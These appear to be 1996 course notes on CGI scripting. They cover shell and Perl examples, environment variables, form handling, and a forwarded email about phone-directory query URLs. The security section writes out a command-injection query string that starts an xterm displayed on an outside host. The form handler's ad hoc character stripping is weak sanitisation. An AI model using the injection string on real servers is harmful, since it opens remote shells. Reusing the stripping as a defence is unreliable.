CGI PROGRAMMING
Dennis Shasha
(with thanks to Sid Bytheway for some great examples)
fall 1996

Directory with my cgi scripts:

You will be able to set up your own cgi scripts in your directories
as follows.

cd
chmod a+x .
mkdir public_html
chmod og+r public_html    --- may not be necessary
cd public_html
mkdir cgi-bin
chmod og+r cgi-bin        --- may not be necessary
cd cgi-bin

Now, put your cgi-bin scripts in that cgi-bin directory.
Make them executable using chmod +x.
Invoke them as follows. Start netscape and open the location:
http://acf5.nyu.edu/cgi-bin/cgiwrap/~foo/bar
e.g.
netscape http://acf5.nyu.edu/cgi-bin/cgiwrap/~des1/date2
netscape http://acf5.nyu.edu/cgi-bin/cgiwrap/~des1/date2?hello
netscape http://acf5.nyu.edu/cgi-bin/cgiwrap/~des1/date2?hello world

------stuff on my machine; IGNORE THIS. These are links
cd /shasha.d/dqg0151/local/httpd/cgi-bin/dennis
how to invoke a perl script foo.pl there
netscape http://shasha.cs.nyu.edu:8080/cgi-bin/dennis/form7.pl
--------end of stuff on my machine

good teaching material:
http://ute.usi.utah.edu/bin/cgi-programming/counter.pl/cgi-programming/index.html
http://www.ncsa.uiuc.edu/SDG/Software/Mosaic/Docs/fill-out-forms/overview.html

Good book (not in your notes):
CGI Programming in C & Perl by Thomas Boutell. ISBN 0-201-42219-0
=================================
Simplest possible cgi program
(content type is what kind of thing to return and must be followed
by a blank line, hence the second echo)

#!/bin/sh
DATE=/bin/date
echo Content-type: text/plain
echo
if [ -x $DATE ]; then
    $DATE
else
    echo Cannot find date command on this system.
fi
=================================
Above program is called date and can be invoked by
http://acf5.nyu.edu/cgi-bin/cgiwrap/~des1/date2

Limitations: this is one-way communication (I want to pass parameters
to my program), and the output is ugly.

Information passed has the following properties:
spaces are converted to plus signs.
Any character can be sent as a % sign followed by its two-digit
hexadecimal ASCII code, e.g. %2B for a plus sign.
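The encoding rules above can be undone inside a script. Here is a minimal sketch, not taken from the course scripts: the function name urldecode is made up for illustration, and awk is assumed to be available on the server. It turns plus signs back into spaces and each %XX back into the character with that hexadecimal code.

```shell
#!/bin/sh
# urldecode is a hypothetical helper name, not part of any CGI library.
# It decodes one encoded string given as $1 and prints the result.
urldecode() {
    printf '%s\n' "$1" | LC_ALL=C awk '
    {
        out = ""
        n = length($0)
        for (i = 1; i <= n; i++) {
            c = substr($0, i, 1)
            if (c == "+") {
                out = out " "                      # plus sign means space
            } else if (c == "%" && i + 2 <= n) {
                # look up each hex digit; index() returns 0 if it is not one
                hi = index("0123456789abcdef", tolower(substr($0, i + 1, 1))) - 1
                lo = index("0123456789abcdef", tolower(substr($0, i + 2, 1))) - 1
                if (hi >= 0 && lo >= 0) {
                    out = out sprintf("%c", hi * 16 + lo)
                    i += 2                         # skip the two hex digits
                } else {
                    out = out c                    # not a valid escape: keep the %
                }
            } else {
                out = out c
            }
        }
        print out
    }'
}
```

In a script like the ones in these notes it could be called as urldecode "$QUERY_STRING". The decoded text is still untrusted user input.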
=================================
Second program (date2)
This one prints out what is sent in as part of the address
http://satchmo.cs.nyu.edu:8080/cgi-bin/date2/env.sh?hello+there
(Must make it globally readable and executable using e.g. chmod 755 filename)
(If you replace the + sign with a blank, the part after the blank
is not included.)

#!/bin/sh
DATE=/bin/date
echo Content-type: text/plain
echo
echo "query string is $QUERY_STRING"
if [ -x $DATE ]; then
    $DATE
else
    echo Cannot find date command on this system.
fi
=================================
Third program (date3) has other important variables that you might get
information about (though they might not be filled in automatically):

#!/bin/sh
DATE=/bin/date
echo Content-type: text/plain
echo
echo "query string is $QUERY_STRING"
echo "Here are other variables: "
echo "REQUEST_METHOD (get or post) is $REQUEST_METHOD"
echo "CONTENT_TYPE (for html forms) is $CONTENT_TYPE"
echo "CONTENT_LENGTH (for html forms) is $CONTENT_LENGTH"
echo "REMOTE_HOST (so you can find out stuff) is $REMOTE_HOST"
# REMOTE_IP is not a standard CGI variable; the client address is
# normally found in REMOTE_ADDR.
echo "REMOTE_IP (so you can find out stuff) is $REMOTE_IP"
echo "REMOTE_USER (so you can find out stuff) is $REMOTE_USER"
echo "SERVER_NAME (where your script is running) is $SERVER_NAME"
echo "SERVER_PORT (where your script is running) is $SERVER_PORT"
echo "SCRIPT_NAME (path to your script) is $SCRIPT_NAME"
if [ -x $DATE ]; then
    $DATE
else
    echo Cannot find date command on this system.
fi
=================================
Here is output of that:

query string is hello
Here are other variables:
REQUEST_METHOD (get or post) is
CONTENT_TYPE (for html forms) is
CONTENT_LENGTH (for html forms) is
REMOTE_HOST (so you can find out stuff) is dial4-3-async-16.dial.net.nyu.edu
REMOTE_IP (so you can find out stuff) is
REMOTE_USER (so you can find out stuff) is
SERVER_NAME (where your script is running) is satchmo.cs.nyu.edu
SERVER_PORT (where your script is running) is 8080
SCRIPT_NAME (path to your script) is /cgi-bin/date3
Fri Jun 21 04:51:03 EDT 1996

(REQUEST_METHOD is blank in this run because the script that produced it
spelled the variable $REQUST_METHOD. REMOTE_IP is blank because servers
set REMOTE_ADDR instead. CONTENT_TYPE and CONTENT_LENGTH are filled in
only when form data is POSTed.)
=================================
Limitation: This is still ugly. Let's write a little perl program
that at least makes this nice by using html (date4.pl)
http://satchmo.cs.nyu.edu:8080/cgi-bin/date4.pl/env.sh?hello+there+first+perl

#!/usr/local/bin/perl
#Other systems would use #!/usr/bin/perl
print "Content-type: text/html\n\n";
#The following prints out until the string EOF
print <<EOF;
<title>Hi there!</title>
<h1>My First Perl/HTML file</h1>
EOF
=================================
You can see how to write a program that counts the number of accesses
to a document. You are to write a variant that sends out a joke of the
day depending on the count number.
http://ute.usi.utah.edu/bin/cgi-programming/showsrc/counter.pl
=================================
Security is a MAJOR issue, which is why NYU administration
is reluctant to give access to cgi-bin stuff.
http://ute.usi.utah.edu/bin/cgi-programming/counter.pl/cgi-programming/security.html

The basic problem is that an attacker may be able to embed shell
commands in the data he sends. Example: suppose your script runs

grep $search_string /my/file

and the user's query string is:

"x+/dev/null;+xterm+-display+myhost.utah.edu+&;+/bin/false"

Once the plus signs are decoded to spaces, the shell sees the semicolons
as command separators, so the user has successfully kicked off an xterm
on your machine, running as the userid of your HTTP server.

In development, a common bug is to have insufficient permissions
on files you are accessing.
Perl may fail silently if the file it wants to write cannot be opened,
so check the return value of open.
=================================
POSTING INSTEAD OF GETTING

The form output can be returned to your program by one of two methods.
The GET method returns the form data to your program in the query
string. The POST method returns the form data to your CGI program on
the "standard input". Generally the POST method is preferred for forms,
especially when the form returns a large amount of data, because many
browsers limit the length of a URL. It is also convenient, at times, to
put other information in the query string of the URL.

You already know how to use the QUERY_STRING environment variable to
retrieve query information. When using the POST method to return form
data to your CGI program, the http server places the data on the
standard input of your program. The http server is not required to send
your program an end-of-file indicator, nor is it required to end the
data with a carriage return. So, be careful: read exactly the number of
bytes given by the CONTENT_LENGTH environment variable.
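A minimal shell sketch of reading POSTed data under those rules, assuming the server sets CONTENT_LENGTH. The function name read_post_body is made up for illustration. It reads exactly CONTENT_LENGTH bytes and stops, instead of waiting for an end-of-file that may never arrive.

```shell
#!/bin/sh
# read_post_body is a hypothetical helper name, not part of any CGI library.
# It copies exactly CONTENT_LENGTH bytes from standard input to standard
# output, so the script never waits for an end-of-file the server may not send.
read_post_body() {
    case "$CONTENT_LENGTH" in
        ''|*[!0-9]*) return 1 ;;    # missing or non-numeric length: refuse to read
    esac
    [ "$CONTENT_LENGTH" -gt 0 ] || return 1
    # bs=1 makes dd count bytes, so count= is the exact number of bytes read
    dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null
}
```

A script would use it as form_data=$(read_post_body) and report an error if it returns non-zero. Reading one byte at a time is slow but keeps the sketch simple.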
Source for this description of the POST method:
http://ute.usi.utah.edu/bin/cgi-forms/counter.pl/cgi-forms/intro.html
This uses what are called html forms.
Forms are NOT more secure than QUERY_STRING based programs.
Please use the same precautions.
=================================
NUTS AND BOLTS OF FORM POSTING

The <FORM> HTML Directive.

The <FORM> HTML directive indicates the beginning of an HTML form.
The form definition should be followed by a </FORM> HTML directive.
An HTML document may contain one or more HTML forms.
The sub elements of the <FORM> directive are:

ACTION="/bin/script"
    Defines the URL of the CGI program that will process the output of
    the form. The default is the current URL (so if the form is
    generated by the CGI program that will process it, this element can
    be left off.)
METHOD="GET|POST"
    Defines the method by which the CGI Program will get the output
    from the form. The GET method places the form output on the URL in
    the query string. The POST method places the output on the stdin of
    the CGI program and sets the CONTENT_LENGTH variable to the length
    of the data.

The <INPUT> directive defines an input field. It may take on a number
of characteristics, as defined by the type, size, and maxlength options.

TYPE="type"
    Defines the type of input field. There are seven types of input
    fields. They are:
    TEXT      A Text field that accepts character data.
    PASSWORD  A Text field that accepts character data, however the
              input data is not displayed.
    CHECKBOX  A field that is either "on" or "off".
    RADIO     A selectable field. Only one of all similarly named radio
              buttons can be "on", the others are automatically turned
              off.
    HIDDEN    Displays nothing on the screen, but when the form is
              returned the value of the hidden field is also returned.
    SUBMIT    A clickable button that sends the form to the URL defined
              in the ACTION option of the <FORM> directive.
    RESET     A clickable button that causes the browser to reset the
              form fields to their default values.
NAME="name"
    Defines the variable name that is to be associated with the value
    of the input field.
SIZE=num
    Defines the width in characters of the input field. This option is
    valid only with the TEXT and PASSWORD input fields.
MAXLENGTH=num
    Defines the maximum number of characters that the input field will
    allow to be input. This option is valid only with the TEXT and
    PASSWORD input fields.
CHECKED
    Specifies that this field should be selected or checked by default.
    This option is valid only with the CHECKBOX and RADIO input fields.
VALUE="value"
    This option is used differently depending on the TYPE of the field.
    The uses are as follows:
    For TYPE=TEXT and TYPE=PASSWORD fields
        Defines the default input text.
    For TYPE=CHECKBOX and TYPE=RADIO fields
        Defines the value that is to be returned when the field is
        checked or selected.
    For TYPE=HIDDEN fields
        Defines the value to be returned with this field.
    For TYPE=SUBMIT and TYPE=RESET fields
        Defines the text that is to be displayed in the button.
        The default text is "submit" and "reset".

The <TEXTAREA> directive defines a multi-line text input area. Text
between <TEXTAREA> and </TEXTAREA> will be included as "default text"
in the input area. The options are:

NAME="name"
    Defines the variable name that is to be associated with the text
    in the input area.
ROWS=num
    Defines the height in lines of the input area.
COLS=num
    Defines the width in characters of the input area.

The <SELECT> and <OPTION> directives. Multiple
EOF
=================================
form5process.pl

#!/usr/local/bin/perl
#Other systems would use #!/usr/bin/perl
print "Content-type: text/html\n\n";
#The following prints out until the string EOF
print <<EOF;
<title>Hi there!</title>
<h1>I don't want to do anything</h1>
EOF
=================================
HERE IS A MORE COMPLEX FORM, FOR QUERIES
form6.pl:

#!/usr/local/bin/perl
#Other systems would use #!/usr/bin/perl
print "Content-type: text/html\n\n";
#The following prints out until the string EOF
print <<EOF;
<title>Hi there!</title>
#first form as before

textfield:

#now for a check box

Check box1 check1
Check box2 check2
Check box3 check3

#now for a radio button

Radio1 rad1
Radio2 rad2
Radio3 rad3

#now for a hidden field

#now for a selection

#now for the submit part

EOF
=================================
RESPONSE FORM form6process.pl
This uses variables submitted.

#!/usr/local/bin/perl
#Other systems would use #!/usr/bin/perl

#
#  Check for form data.
# ---------------------
if( !defined($ENV{'CONTENT_LENGTH'}) || $ENV{'CONTENT_LENGTH'} <= 0 ) {
    mydie( "No form data was sent." );
}

#
#  Read exactly CONTENT_LENGTH bytes of form data from standard input.
# --------------------------------------------------
$form_data = "";
$to_read = $ENV{'CONTENT_LENGTH'};
if(($red = sysread( STDIN, $form_data, $to_read )) != $to_read ) {
    mydie( "Only read $red from you, but I was supposed to get $to_read" );
}

#
#  Start the HTML document.
# --------------------------------------------
print <<"EOF";
Content-type: text/html

<title>Name/Value Pairs</title>
<h1>Name/Value Pairs</h1>
Here was all of the form data:
<ul>
<li> ENV{"$form_data"}
</ul>
The Following name/value pairs were received from your form.
<pre>
EOF

#
#  Split out and print the name/value pairs.
# --------------------------------------------
@name_value_pairs = split( /&/, $form_data );
foreach $pair ( @name_value_pairs ) {
    ($name,$value) = split( /=/, $pair );

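    # de-code the URL encoding: "+" means space, %XX is a hex character code
    $value =~ tr/+/ /;
    $value =~ s/%([0-9A-Fa-f]{2})/pack("C", hex($1))/ge;

    # strip shell metacharacters (backquote, quotes, semicolon, pipe)
    $value =~ s/\`|\"|\'|\;|\|//g;
    #$value = `../../support/unescape "$value"`;
    # We don't seem to have this command (that puts quotes around
    # all special shell characters).

    # change HTML special characters
    $value =~ s/&/&amp\;/g;
    $value =~ s/</&lt\;/g;
    $value =~ s/>/&gt\;/g;
    printf( "%10s = %s\n", $name, $value );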

}
exit(0);



#  mydie
#  Die with an HTML msg.
#
sub mydie {
    local($msg) = @_;

    print "Content-type: text/html\n\n";
    print "$msg\n\n";
    exit(1);
}
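
The same splitting and escaping can be sketched in shell. This is a rough equivalent for illustration, not a translation of the Perl above: the names html_escape and print_pairs are made up, and it does not decode %XX escapes.

```shell
#!/bin/sh
# html_escape and print_pairs are hypothetical helper names.

# Replace the characters that are special in HTML with their entities.
# "&" must be handled first so the entities themselves are not re-escaped.
html_escape() {
    printf '%s\n' "$1" | sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g'
}

# Print each name/value pair of a form string such as "a=1&b=2" on its
# own line, with the value made safe to show inside an HTML page.
print_pairs() {
    # Turn each "&" separator into a newline, then split each line at the
    # first "="; anything after it (including further "=") is the value.
    printf '%s\n' "$1" | tr '&' '\n' | while IFS='=' read -r name value; do
        printf '%10s = %s\n' "$name" "$(html_escape "$value")"
    done
}
```

For example, print_pairs "$form_data" lists every pair the form sent, one per line.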

print "Content-type: text/html\n\n";
#The following prints out until the string EOF
print <<EOF;
<title>Hi there!</title>
EOF
=================================
We now show the behavior of the second Unix homework.
form7.pl and formprocess7.pl

From shasha@ny.ubs.com Tue Oct 29 13:18 EST 1996
From: shasha@ny.ubs.com
Date: Tue, 29 Oct 1996 12:51:51 -0500 (EST)
To: shasha@cs.NYU.EDU
Subject: cgi info

From rct@ny.ubs.com Fri Oct 25 18:06:25 1996
From: rct@ny.ubs.com (Robert C. Terzi)
Date: Fri, 25 Oct 1996 18:06:18 -0400
In-Reply-To: "Daniel F. Fisher" "URL on query response page" (Oct 25, 2:52pm)
To: "Daniel F. Fisher", phone-app@ny.ubs.com, webmaster@ny.ubs.com,
    nyrdt@ny.ubs.com, nywdh@ny.ubs.com, nnyorh@ny.ubs.com, shasha@ny.ubs.com
Subject: Re: URL on query response page

Warning: I was pretty fried when I read this. After reading it
several times, I think I understand what you are asking.

What I think you are asking is how HTTP->CGI passes parameters
and what the query language for the phone book is:

[ note: This response should probably be filed some place, like an FAQ. ]

- It is possible to do HTTP->CGI transactions via two different
  methods: GET and POST.

  For the GET Method, the parameters are part of the URL:

      http://foo/cgi-bin/query?name=foo&other=bar&baz=42

  For the POST method, the parameters are sent in the body of the
  request, like a mime-attachment.

  GETs are convenient because any place that you can put a URL you can
  use a "stored query". When formatting data for output in web pages,
  you can "print" them as a URL that causes a query to be done, which
  allows some "modularity".

  POSTs are good because they encapsulate the data well and can deal
  with long parameter lists.

  Many CGI libraries can deal with BOTH GETs and POSTs, which is
  important for maximum flexibility.

- The phone application uses both GETs and POSTs, depending upon
  what it is doing.

      For form based stuff it uses POSTs
      For hyperlinks it uses GETs.

- The old base URL is:

      http://phone.ny.ubs.com/cgi-bin/wdb/phonebook/users/query

- I've been working on a cleaner interface to the phone cgi that
  would deal with GETs/POSTs better:

      http://phone.ny.ubs.com/phone2.cgi

- To make queries against the directory in your web pages:

  Use either the old or new URL and a parameter list like:

      http://phone.ny.ubs.com/phone2.cgi?field=value&field2=value2
      http://phone.ny.ubs.com/cgi-bin/wdb/phonebook/users/query?field=value

  Here are some example queries, I will list just the ?parameter list:

      ?name=fisher
          List all people who have fisher in their name.
      ?floor==9
          List all people who are on the 9th floor.
          Note this is an exact match, so people on 19, 29, etc.
          won't be listed.
      ?unit1=opte
          List people in the division OPTE.
      ?unit1=opte&floor==9
          List people in the division OPTE on the 9th Floor.
      ?unit1=opte&floor!=9
          List people in division OPTE who are NOT on the 9th floor.
      ?unit1=opte&floor!=9&loc=n299
          List people in OPTE, who aren't on the 9th but are located
          in 299
      ?unit2=itsu
          List people in the unit ITSU
      ?phone=6185
          List people whose phone numbers contain 6185.

- Note this works with other CGI things as well, this one is
  particularly nice, here's how you can do yahoo people look ups
  in your pages:

      http://email.yahoo.com/cgi-bin/Four11?YahooPhoneResults&f=daniel&l=fisher&s=ny

- Got a Phone Number to display? Print the phone number as a URL
  and you can do lookups:

      http://email.yahoo.com/cgi-bin/Four11?YahooPhoneResults&p=2125551212&y=z

--Robert

>> In "URL on query response page", Oct 25, "Daniel F. Fisher" writes <<
> This now says
>
>
>
> So i cannot easily give people a URL that repeats a particular
> query.
>
> Didn't it used to?
>
> How would I?
>> End of "Daniel F. Fisher"'s message <<
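
The "stored query" idea from the message above can be sketched in shell: build a GET URL from a base URL and one field/value pair. This is an illustration only. The function names urlencode and query_url are made up, awk is assumed to be available, and the operator forms such as floor==9 are not handled.

```shell
#!/bin/sh
# urlencode and query_url are hypothetical helper names.

# Encode one string for use in a query string: letters, digits and . _ ~ -
# pass through, a space becomes "+", anything else becomes %XX (hex code).
urlencode() {
    printf '%s\n' "$1" | LC_ALL=C awk '
    BEGIN {
        # build a character -> code table, since awk has no ord() function
        for (i = 1; i < 256; i++) ord[sprintf("%c", i)] = i
    }
    {
        out = ""
        n = length($0)
        for (i = 1; i <= n; i++) {
            c = substr($0, i, 1)
            if (c ~ /[A-Za-z0-9._~-]/) out = out c
            else if (c == " ") out = out "+"
            else out = out sprintf("%%%02X", ord[c])
        }
        print out
    }'
}

# query_url BASE FIELD VALUE prints BASE?FIELD=VALUE with both parts encoded.
query_url() {
    printf '%s?%s=%s\n' "$1" "$(urlencode "$2")" "$(urlencode "$3")"
}
```

For example, query_url http://phone.ny.ubs.com/phone2.cgi name fisher prints a URL that can be stored in a page and followed later to repeat the query.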